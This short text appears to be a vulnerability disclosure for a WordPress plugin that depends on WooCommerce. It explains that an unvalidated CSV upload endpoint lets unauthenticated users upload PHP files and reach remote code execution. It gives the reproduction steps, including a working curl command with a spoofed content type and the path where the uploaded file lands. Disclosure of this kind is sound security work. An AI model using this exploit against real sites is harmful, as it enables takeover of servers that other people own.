The plugin does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE.
1. Install and activate WooCommerce (dependency, no setup required)
2. Create a local file containing the payload on /tmp/payload.php
3. Execute the following curl command:
curl -i 'https://example.com/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload' -F 'file=@/tmp/payload.php;type=text/csv'
4. The uploaded file will be available at wp-content/uploads/mfw-activity-logger/csv-uploads .